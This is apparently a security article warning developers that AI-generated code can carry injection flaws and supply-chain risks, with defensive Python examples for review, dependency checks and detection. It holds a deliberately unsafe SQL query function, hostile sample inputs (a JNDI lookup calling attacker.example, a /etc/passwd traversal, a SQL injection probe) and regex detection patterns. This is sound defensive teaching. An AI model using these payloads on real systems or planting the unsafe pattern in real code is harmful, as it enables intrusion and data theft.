Development teams are moving fast, and AI coding tools have made that even easier. You describe what you need, the tool generates a block of code, and it drops right into your codebase. No Stack Overflow. No digging through docs. Just output, ready to use.

When AI Writes the Code, Who Ensures It's Secure?

AI coding assistants pull patterns from large bodies of training data. That data includes well-written, secure code, but it also includes examples from older tutorials, deprecated libraries, and historically vulnerable implementations that were never corrected.



The result is that AI-generated code can look perfectly fine and still carry real weaknesses: input fields that pass data to a database without sanitization, authentication flows that skip expiry checks on tokens, or cryptographic operations that use outdated defaults. Nothing in the output flags it as risky. It compiles. It runs. It gets merged.
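To make the first of those weaknesses concrete, here is a minimal Python sketch using the standard-library `sqlite3` module. The `users` table and both function names are hypothetical. The contrast is between SQL built by string formatting, a pattern common in older tutorials, and a parameterized query where the driver binds the input as data.

```python
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    # UNSAFE: the input is pasted into the SQL text, so a value such as
    # "x' OR '1'='1" rewrites the WHERE clause and matches every row.
    query = f"SELECT id, name FROM users WHERE name = '{username}'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # SAFER: the "?" placeholder makes sqlite3 bind the value as data,
    # so it cannot change the structure of the query.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (username,)
    ).fetchall()

if __name__ == "__main__":
    # Throwaway in-memory database with two hypothetical users.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])

    payload = "x' OR '1'='1"
    print(len(find_user_unsafe(conn, payload)))  # 2: every row is returned
    print(len(find_user_safe(conn, payload)))    # 0: no user has that literal name
```

Both functions compile, run, and return plausible results for normal input like `"alice"`, which is exactly why the unsafe version can slip through review.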

This is not a hypothetical concern. The Log4Shell vulnerability (CVE-2021-44228) showed how a single logging library, widely used and rarely scrutinized, became a remote code execution vector across thousands of production applications. Code that arrives via an AI suggestion carries the same risk if the library or pattern it relies on is not examined before deployment.

The Silent Threat of Software Dependencies

When AI tools suggest a package, most developers install it. The name looks right, the function fits, and the workflow keeps moving.

But packages can be compromised. Attackers publish libraries with names similar to popular ones (typosquatting), inject malicious code into legitimate packages through compromised maintainer accounts, or publish packages that silently exfiltrate credentials on install. Campaigns against open-source ecosystems, such as the one tracked under the name Shai-Hulud, follow exactly this pattern.
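The lookalike-name trick is the easiest of these to screen for mechanically. The sketch below uses the standard-library `difflib.get_close_matches` to flag a requested package whose name is suspiciously close to, but not the same as, a trusted one. `KNOWN_PACKAGES` and the `0.8` similarity cutoff are illustrative assumptions, and this check does nothing against a legitimate package whose maintainer account was compromised.

```python
import difflib

# Hypothetical allowlist: in practice, the packages your organisation
# already uses and trusts, not a hard-coded list.
KNOWN_PACKAGES = ["requests", "numpy", "pandas", "django", "flask"]

def lookalike_of(candidate: str, known=KNOWN_PACKAGES, cutoff: float = 0.8):
    """Return the trusted name that `candidate` closely resembles, or None.

    An exact match to a trusted name is not suspicious, so it returns None.
    The cutoff is an assumed threshold on difflib's similarity ratio (0..1).
    """
    name = candidate.lower()
    if name in known:
        return None
    matches = difflib.get_close_matches(name, known, n=1, cutoff=cutoff)
    return matches[0] if matches else None

if __name__ == "__main__":
    for requested in ["reqeusts", "numpyy", "flask", "left-pad"]:
        print(requested, "->", lookalike_of(requested))
```

A hit here is a prompt to check the publisher and repository by hand before installing, not proof of malice.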

If a developer installs a dependency based on an AI suggestion without checking the publisher, reviewing the repository, or scanning for known issues, they may be introducing a supply chain risk into every environment that pulls from that build.
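Once a dependency has been reviewed, one way to keep every environment on that exact artifact is to pin its hash, which is the idea behind pip's hash-checking mode (`--require-hashes`). The Python sketch below shows the underlying check with `hashlib`; the function names and the demo file are hypothetical stand-ins for a real downloaded package.

```python
import hashlib
import os
import tempfile

def sha256_of(path: str) -> str:
    """Hash the file in 64 KiB chunks so large archives need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_pin(path: str, pinned_sha256: str) -> bool:
    """True only if the artifact on disk is byte-for-byte the one that was reviewed."""
    return sha256_of(path) == pinned_sha256.strip().lower()

if __name__ == "__main__":
    # A throwaway file stands in for a downloaded package.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"reviewed package contents")
    pin = sha256_of(tmp.name)          # recorded at review time
    print(matches_pin(tmp.name, pin))  # True
    with open(tmp.name, "ab") as fh:
        fh.write(b"\n# injected payload")
    print(matches_pin(tmp.name, pin))  # False: contents changed after review
    os.remove(tmp.name)
```

Pinning only guarantees you get what you reviewed; it does not make an unreviewed package safe, so it complements rather than replaces the publisher and repository checks.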

What Real-World Exploitation Looks Like

When insecure code reaches production and gets exploited, it leaves traces, but only if you are looking for them.

Unexpected outbound connections from an application process. System calls that spawn child processes or read environment variables. Input values containing SQL metacharacters, JNDI lookup strings, or path traversal sequences. Access to credential files that no normal request should touch.
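Some of the input-level signals above can be matched with simple patterns. The Python sketch below is illustrative only: the regular expressions are assumptions, not vetted detection rules, and obfuscated payloads will evade them. `${jndi:` is the lookup syntax abused in Log4Shell, `../` and its URL-encoded form indicate path traversal, and quotes, comment markers, or `UNION SELECT` are common SQL injection probes.

```python
import re

# Illustrative patterns only; real rules need tuning and will still miss
# obfuscated variants of these payloads.
INDICATORS = {
    "jndi_lookup": re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE),
    "path_traversal": re.compile(r"(\.\./|\.\.\\|%2e%2e%2f)", re.IGNORECASE),
    "sql_metachar": re.compile(r"('|--|;|/\*|\bunion\s+select\b)", re.IGNORECASE),
}

def flag_input(value: str) -> list[str]:
    """Return the names of every indicator pattern found in `value`."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(value)]

if __name__ == "__main__":
    samples = [
        "${jndi:ldap://attacker.example/a}",
        "../../etc/passwd",
        "x' OR '1'='1",
        "alice",
    ]
    for sample in samples:
        print(repr(sample), flag_input(sample))
```

Legitimate input such as the surname "O'Brien" also trips `sql_metachar`, so matches like these are better logged as investigation signals than used to reject requests outright.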

Without structured logging, runtime monitoring, and clear baselines for normal behavior, these signals are easy to miss. And the longer they go undetected, the more time an attacker has to move laterally, exfiltrate data, or establish persistence.
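As a sketch of how a baseline and structured logging fit together, the Python example below compares each outbound connection against an allowlist of expected destinations and emits a JSON log line for anything else. It assumes connection events arrive from some external source, such as an egress proxy or host agent, which is not shown; `BASELINE`, `check_outbound`, and the field names are all hypothetical.

```python
import json
import logging

logging.basicConfig(level=logging.INFO, format="%(message)s")
logger = logging.getLogger("egress-monitor")

# Hypothetical baseline: the (host, port) pairs this service normally
# contacts, for example learned during a quiet observation period.
BASELINE = {("db.internal", 5432), ("payments.example.com", 443)}

def check_outbound(process: str, host: str, port: int) -> bool:
    """Return True for baseline traffic; otherwise log a structured JSON
    warning that a log pipeline can index, search, and alert on."""
    if (host, port) in BASELINE:
        return True
    logger.warning(json.dumps({
        "event": "unexpected_outbound_connection",
        "process": process,
        "dest_host": host,
        "dest_port": port,
    }))
    return False

if __name__ == "__main__":
    check_outbound("web-api", "db.internal", 5432)    # expected, nothing logged
    check_outbound("web-api", "203.0.113.50", 1389)   # logged as a JSON warning
```

Emitting one JSON object per event, rather than free text, is what makes the later investigation step practical: the fields can be queried directly instead of parsed out of prose.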

Don't Trust AI Code Without Validation

The framing that makes this manageable is simple: treat code generated by an AI tool the same way you would treat a pull request from an unknown contributor. You do not merge it without reading it.

At an operational level, this means:

Security-aware code review that specifically looks for the patterns AI tools tend to generate: injection sinks, unvalidated inputs, and weak authentication defaults.

Static analysis running on every commit, not just before a release.

Dependency scanning that blocks merges introducing packages with unresolved critical findings.

Manual review of any code handling authentication, cryptography, or sensitive data regardless of where it came from.

Runtime monitoring with enough coverage to detect exploitation attempts and support investigation if something goes wrong.
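The dependency-scanning gate in particular can be a small CI step. The Python sketch below reads a scanner report and returns a non-zero exit code when any critical finding is unresolved, which most CI systems treat as a failed check that blocks the merge. The JSON report shape is a hypothetical assumption; real tools such as `npm audit` or `pip-audit` have their own output formats, which would need to be mapped onto it.

```python
import json
import sys

# Hypothetical report format: a JSON list of findings such as
# {"package": "example-lib", "severity": "critical", "status": "open"}.
BLOCKING_SEVERITIES = {"critical"}

def blocking_findings(findings: list[dict]) -> list[dict]:
    """Keep findings that are critical and not yet marked resolved."""
    return [
        f for f in findings
        if f.get("severity", "").lower() in BLOCKING_SEVERITIES
        and f.get("status", "open").lower() != "resolved"
    ]

def main(report_path: str) -> int:
    """Return 1 (fail the check) if anything blocks the merge, else 0."""
    with open(report_path, encoding="utf-8") as fh:
        findings = json.load(fh)
    blockers = blocking_findings(findings)
    for f in blockers:
        print(f"BLOCKED: {f.get('package')} has an unresolved {f.get('severity')} finding")
    return 1 if blockers else 0

if __name__ == "__main__" and len(sys.argv) == 2:
    sys.exit(main(sys.argv[1]))
```

Run as `python gate.py report.json` (the script name is arbitrary). Treating a missing `status` as open is a deliberate fail-closed choice: an ambiguous finding blocks the merge until someone looks at it.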